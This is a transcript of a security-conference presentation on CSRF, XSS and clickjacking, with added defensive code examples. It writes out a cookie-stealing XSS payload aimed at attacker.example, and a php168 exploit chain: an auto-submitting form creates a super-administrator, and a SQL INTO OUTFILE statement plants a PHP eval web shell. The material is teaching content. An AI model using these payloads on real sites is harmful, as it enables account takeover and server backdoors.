TAIS (Taiwan Academic Information Security International Conference): CSRF (Cross-Site Request Forgery) Attack Analysis and Mitigation
DESCRIPTION
TAIS 台灣學術資訊安全國際研討會: CSRF (Cross-Site Request Forgery) Attack Analysis and Mitigation. Cross-Site Request Forgery Threat and Mitigation. Speaker: 夏克強, Senior Technical Consultant, 麟瑞科技 (Ringline), CISSP, CHFI, CEH. Transcript of a PowerPoint presentation.
![Page 1: TAIS 台灣學術資訊安全國際研討會 CSRF( 跨站偽冒請求 ) 攻擊的分析與防護 Cross-Site Request Forgery Threat and Mitigatio n](https://reader033.vdocuments.mx/reader033/viewer/2022061508/568159a3550346895dc6fc93/html5/thumbnails/1.jpg)
TAIS 台灣學術資訊安全國際研討會 (Taiwan Academic Information Security International Conference)
CSRF (Cross-Site Request Forgery) Attack Analysis and Mitigation
Cross-Site Request Forgery Threat and Mitigation
夏克強, Senior Technical Consultant, 麟瑞科技 (Ringline); CISSP, CHFI, CEH
Why Web Applications Are Vulnerable
Improved commercial or in-house application access to information means improved access for hackers?
(Slide diagram: a layered stack of Network, Operating Systems, Web Servers, Application Servers and Database Servers, fronted by a network firewall and IDS/IPS. The attacks that pass straight through those controls, SQL injection, parameter tampering, XSS and the like, land on the web application layer.)
Web applications (Web AP): those not yet live are rushed into production; those already live are years old.
75% of attacks concentrate on this layer.
The database servers hold customer information, business data and transaction information: personal data, transaction records, customer records.
OWASP Top Ten: Mapping from 2007 to 2010
(Slide diagram: the 2007 and 2010 OWASP Top Ten lists side by side, with entries marked as added (+), removed (-) or unchanged (=).)
Cybercrime Threats: Cyber Pickpocketing
BEBLOH, where the malware went beyond "traditional" keylogging: not only stealing credit card information but also accessing the account and transferring funds to another account.
Cross-Site Scripting
Reflected XSS and stored XSS (aka persistent XSS). The Samy worm. Web sites compromised: FBI.gov, CNN.com, Time.com, eBay, Yahoo, Apple Computer, Microsoft, ZDNet, Wired and Newsbytes.
Top weakness in recent years. Typical pages vulnerable to XSS: search pages, forums, comments, login pages.
Cross-Site Scripting attacks: hoaxes; stealing the user's session ID and cookies; near-complete control of the victim's browser, such as port scanning, keylogging and sending requests on behalf of the client.
Stored Cross-Site Scripting
(Slide diagram: an application with a stored XSS vulnerability; its custom code sits on top of the business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce and Bus. Functions.)
1. Attacker sets the trap ("update my profile"): the attacker enters a malicious script into a web page that stores the data on the server.
2. Victim views the page and sees the attacker's profile: the script runs inside the victim's browser with full access to the DOM and cookies.
3. The script silently sends the victim's session cookie to the attacker.
Stored and Reflected XSS
Stored XSS guarantees that victim users are already using the application at the moment the attack strikes.
Reflected XSS must use some means of inducing users to visit the attacker's crafted URL, and may try to engineer the situation by persuading the user to log in; a phishing attack that offers a link to the attacker's own malicious web server would be suspected as a scam.
Stored XSS avoids that requirement, which is why stored (persistent) XSS is more serious than reflected XSS.
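The three-step stored XSS flow above, as an added example that is not part of the slides: a profile field rendered straight into markup versus rendered through an HTML escaper, and the cookie flag that blunts step 3. The profile text, the attacker.example host and the cookie name are constructed for the demo.

```javascript
// Escape the five characters that let a value break out of an HTML text node
// or a double-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed attacker "profile" (step 1): a script that loads an image from a
// host the attacker controls, with document.cookie appended to the URL.
const STORED_PROFILE =
  "Hi there <script>new Image().src='https://attacker.example/c?'+document.cookie</script>";

// Vulnerable rendering: the stored value is concatenated straight into markup,
// so the browser runs the script when the victim views the profile (steps 2-3).
function renderProfileUnsafe(profile) {
  return `<div class="profile">${profile}</div>`;
}

// Fixed rendering: escape at the point of output, in HTML text context.
function renderProfileSafe(profile) {
  return `<div class="profile">${escapeHtml(profile)}</div>`;
}

// Does the rendered markup still contain an executable <script> element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Independent mitigation for the cookie theft in step 3: HttpOnly keeps the
// session cookie out of document.cookie, Secure keeps it off plain HTTP. It does
// not stop the injected script from sending requests as the victim.
function sessionCookieHeader(sessionId) {
  return `SESSIONID=${sessionId}; Path=/; Secure; HttpOnly`;
}

function xssDemo() {
  return {
    unsafeRunsScript: containsScriptTag(renderProfileUnsafe(STORED_PROFILE)), // true
    safeRunsScript: containsScriptTag(renderProfileSafe(STORED_PROFILE)),     // false
    cookie: sessionCookieHeader('abc123'),
  };
}
```

Escaping belongs at the output point, in the context the value lands in; the escaper here is only correct for HTML text and double-quoted attribute values, not for values inserted into JavaScript, URLs or CSS.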
Clickjacking (點擊綁架)
In clickjacking the attacker hijacks the user's mouse clicks, so that the user unknowingly clicks a link or button the attacker has carefully placed. It can be seen as an advanced phishing technique. Clickjacking and CSRF (also called session riding) are alike in that both make the user act without realising it, and combining clickjacking with CSRF multiplies the effect of the attack.
Clickjacking Defences
Client side: in Firefox, NoScript's ClearClick feature blocks the hidden frame, or disable JavaScript altogether.
Frame busting (anti-framing) for your own sites: <script>if (top != self) top.location = location</script>. This is only a partial control: a page loaded in a frame carrying the sandbox attribute (scripts disabled, or top navigation not allowed) either cannot run the script or cannot navigate the top window.
IE8 added a defence against clickjacking: the response header X-FRAME-OPTIONS: DENY or X-FRAME-OPTIONS: SAMEORIGIN.
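The header-based defence above, as an added example that is not from the slides: a helper that emits the anti-framing headers, and a model of the browser's decision so the DENY and SAMEORIGIN cases can be checked. It also carries the CSP frame-ancestors directive, which is not on the slide and is included as the current standard successor to X-Frame-Options; the bank.example, evil.example and partner.example origins are constructed for the demo.

```javascript
// Headers a page that must not be framed by third parties should send. CSP
// frame-ancestors is the modern equivalent; sending both covers old browsers.
function antiFramingHeaders(mode) {
  const table = {
    deny: { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': "frame-ancestors 'none'" },
    sameorigin: { 'X-Frame-Options': 'SAMEORIGIN', 'Content-Security-Policy': "frame-ancestors 'self'" },
  };
  if (!table[mode]) throw new Error('mode must be "deny" or "sameorigin"');
  return { ...table[mode] };
}

// Pull the frame-ancestors source list out of a CSP header, or null if absent.
function frameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0].toLowerCase() === 'frame-ancestors') return parts.slice(1);
  }
  return null;
}

// Browser-side decision: may a document from pageOrigin, served with these
// headers, be rendered in a frame whose top-level document is topOrigin?
// frame-ancestors wins when present (browsers then ignore X-Frame-Options);
// otherwise DENY/SAMEORIGIN apply; with neither, anyone may frame the page,
// which is the condition a clickjacking page relies on. Only exact-origin
// sources are matched here; CSP host wildcards are not modelled.
function framingAllowed(headers, pageOrigin, topOrigin) {
  const ancestors = frameAncestors(headers['Content-Security-Policy']);
  if (ancestors) {
    return ancestors.some((src) => {
      const s = src.toLowerCase();
      if (s === "'none'") return false;
      if (s === "'self'") return pageOrigin === topOrigin;
      return s === topOrigin.toLowerCase();
    });
  }
  const xfo = (headers['X-Frame-Options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return pageOrigin === topOrigin;
  return true;
}

// The slide's frame-busting script, kept for contrast: it runs inside the framed
// page and is defeated by <iframe sandbox="allow-scripts allow-forms"> (no
// allow-top-navigation), so it is a fallback rather than a control.
const FRAME_BUSTING_SNIPPET = '<script>if (top != self) top.location = location</script>';

function framingDemo() {
  const bank = 'https://bank.example';
  const evil = 'https://evil.example';
  return {
    noHeaders: framingAllowed({}, bank, evil),                                     // true
    deny: framingAllowed(antiFramingHeaders('deny'), bank, bank),                  // false
    selfOk: framingAllowed(antiFramingHeaders('sameorigin'), bank, bank),          // true
    selfAttacker: framingAllowed(antiFramingHeaders('sameorigin'), bank, evil),    // false
    partnerOnly: framingAllowed(
      { 'Content-Security-Policy': 'frame-ancestors https://partner.example' }, bank, evil), // false
    xfoIgnored: framingAllowed(
      { 'X-Frame-Options': 'DENY', 'Content-Security-Policy': "frame-ancestors 'self'" }, bank, bank), // true
  };
}
```

The last case is the one to remember when auditing: if a response carries both headers, the CSP directive is what the browser honours, so a DENY left in X-Frame-Options does not tighten a permissive frame-ancestors.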
Forced Browsing
A blank page that makes the visitor's browser fetch a Google search in a hidden frame:
<html><body>blank page<iframe src="http://www.google.com.tw/search?hl=zh-TW&q=taiwan+taipei" height="0" width="0"></iframe></body></html>
Application: advertising revenue. Technique: thousands of people "click", from different IP addresses, which evades the checks.
Cross-Site Request Forgery
CSRF example, one step further: luring you into clicking a link
Suppose the shopping site you visit is http://www.hacker.net and you buy a product; the request is http://www.hacker.net/buy.php?item=computer&quantity=1. This is a normal HTTP request: the item is "computer" and the quantity is 1, and the site records the item and quantity against the user's account. If an attacker knows the shopping site's workflow, he can forge a similar request, http://www.hacker.net/buy.php?item=computer&quantity=1000, with item "computer" but quantity 1000. If the target user accidentally visits this link while logged in to the site, the account will carry an order for 1000 computers.
CSRF attack on php168
The page for adding a site administrator is:
http://192.168.0.3/php168/admin/index.php?lfj=member&job=addmember
Excerpted from www.haik8.com
The "add new user" form on that page (labels translated; excerpted from www.haik8.com):

```html
<form name="form1" method="post" action="index.php?lfj=member&action=addmember">
  <tr class="head"><td colspan="2">Add new user</td></tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">Account:</td>
    <td width="63%"><input type="text" name="postdb[username]"></td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">Password:</td>
    <td width="63%"><input type="password" name="postdb[passwd]"></td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">Repeat password:</td>
    <td width="63%"><input type="password" name="postdb[passwd2]"></td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">User group: <span help=1>Only a super administrator or the creator can add a new super administrator; only a super administrator, the founder or a front-end administrator can add a new front-end administrator</span></td>
    <td width="63%">
      <select name='postdb[groupid]'>
        <option value='' selected>Existing user groups</option>
        <option value='2'>Guests</option>
        <option value='3'>Super administrators</option>
        <option value='4'>Front-end administrators</option>
        <option value=''>--+ system groups above, member groups below +--</option>
        <option value='8'>Regular members</option>
        <option value='9'>Premium members</option>
      </select>
    </td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%">Email:</td>
    <td width="63%"><input type="text" name="postdb[email]"></td>
  </tr>
  <tr bgcolor="#FFFFFF">
    <td width="37%"></td>
    <td width="63%"><input type="submit" name="Submit" value="Submit"></td>
  </tr>
</form>
```

Note that the form carries no anti-CSRF token: nothing in the request proves it came from the administrator's own page rather than from any site the administrator happens to be viewing while logged in.

The attacker rewrites it into a page that submits itself on load (excerpted from www.haik8.com), with the group preset to 3, the super-administrator group:

```html
<html>
<body onload="document.form1.submit()">
  <form name="form1" method="post" action="http://192.168.0.3/php168/admin/index.php?lfj=member&action=addmember">
    <input type="hidden" name="postdb[username]" value='樱花浪子'>
    <input type="hidden" name="postdb[passwd]" value='nohack'>
    <input type="hidden" name="postdb[passwd2]" value='nohack'>
    <select name='postdb[groupid]'><option value='3' selected></option></select>
  </form>
</body>
</html>
```
Uploading that page gives the path http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm. If an administrator visits this page while logged in to the front end or back end, a super administrator with username "樱花浪子" and password "nohack" is added. (Excerpted from www.haik8.com.)

That page, however, would show the "administrator added" message. To hide it, build an image trojan: a page that loads the attack page in a zero-size frame next to an ordinary picture, uploaded again as special/5_20090426220451_PYwLh.jpg, i.e. http://192.168.0.3/php168/upload_files/special/5_20090426220451_PYwLh.jpg:

```html
<html>
<body>
  <iframe src="http://192.168.0.3/php168/upload_files/special/5_20090425170444_eA==.htm" width="0" height="0"></iframe>
  <img src="/Article/UploadPic/2010-4/2010417144022600.jpg">
</body>
</html>
```

With the new super-administrator account, execute:

```sql
SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE 'C:\\AppServ\\www\\php168\\nohack.php'
```

which writes a one-line PHP backdoor under the web root. Check: it shows the injection succeeded.
Calendar system example
http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20110308

CSRF, Referer and X-Header examples
Forcing the victim to read a specific calendar date, and countermeasures against CSRF. Clickjacking and CSRF reinforce each other: overlay the target in an iframe with opacity 30%.
<a href="http://egw.ringline.com.tw/index.php?menuaction=calendar.calendar_uiviews.day&date=20101016">Click me for a discount</a>
CSRF Prevention
• Insert custom random tokens into every form and URL. Store a single token in the session and add it to all forms and links:
  Hidden field: <input name="token" value="687965fdfaew87agrde" type="hidden"/>
  Single-use URL: /accounts/687965fdfaew87agrde
  Form token: /accounts?auth=687965fdfaew87agrde ...
• For sensitive data or value transactions, re-authenticate or use transaction signing.
• Verify the Referer header, but it is not always present (XHR and privacy settings can suppress it), so a missing Referer must not be taken as proof of a same-site request.
• Verify a custom X-header. This is more effective than the Referer check because of the same-origin policy: a page on another site can make the browser send a GET or a form POST, but cannot attach custom headers to it.
  Legal example (same-origin XMLHttpRequest):
  GET /auth/[email protected] HTTP/1.1
  Host: social.site
  X-CSRF: 1
  Illegal example (forged from another site):
  <html><img src=http://social.site/auth/update_profile.cgi?[email protected]></html>
  which makes the browser send, without the header:
  GET /auth/[email protected] HTTP/1.1
  Host: social.site
• Ensure that there are no XSS vulnerabilities in your application: script running in the site's own origin can read the token and set the header, defeating both checks.
Ratproxy
Semi-automated web application security assessment tool for XSS and CSRF.
Findings should be validated by manual testing and analysis where appropriate; not all of the issues reported necessarily correspond to actual security flaws.
Microsoft Threat Modeling
Threats (STRIDE): Spoofing identity, Tampering with data (integrity), Repudiation, Information disclosure, Denial of service, Elevation of privilege.
Rating (DREAD): Damage potential, Reproducibility, Exploitability, Affected users, Discoverability.
Microsoft Threat Modeling process
1. Identify assets
2. Create an architecture overview
3. Decompose the application
4. Identify the threats
5. Document the threats
6. Rate the threats
OWASP Risk Methodology
CSRF Rating Example
CVSS (Metrics View)
Obstacles for Code Review (or Scanners)
• Can't provide immediate protection.
• Web applications change frequently; in many cases the application changes before a full review cycle has been completed.
• The source code is not readily "available" or "understood".
• Is there enough MIS staff and time to do the re-coding?
• Manual code fixes are only as good as the developer.
• Attacks (again, especially web attacks) also change frequently; no multiple-service correlation capability; can't accurately track which user launched the attacks or the attack patterns.
• Suitable for the development phase, not the production phase.
• Suitable for the development phase, not the design phase (only resolved by risk analysis).
• Slow response to compliance requirements.
• Can't protect web servers and backend database servers.
• No web site cloaking, such as defence against Google hacking.
• Can't provide additional insight into which operations write to the database or are accessed by transaction only.
Obstacles for WAFs
• Suitable for the production phase, not the development phase.
• Suitable for the development phase, not the design phase (only resolved by risk analysis).
• Lack of logical-flaw detection (only resolved by human code review); applications do something insecure.
• Can't accurately correct application flaws.
• A WAF could go down (fail-open or fail-closed).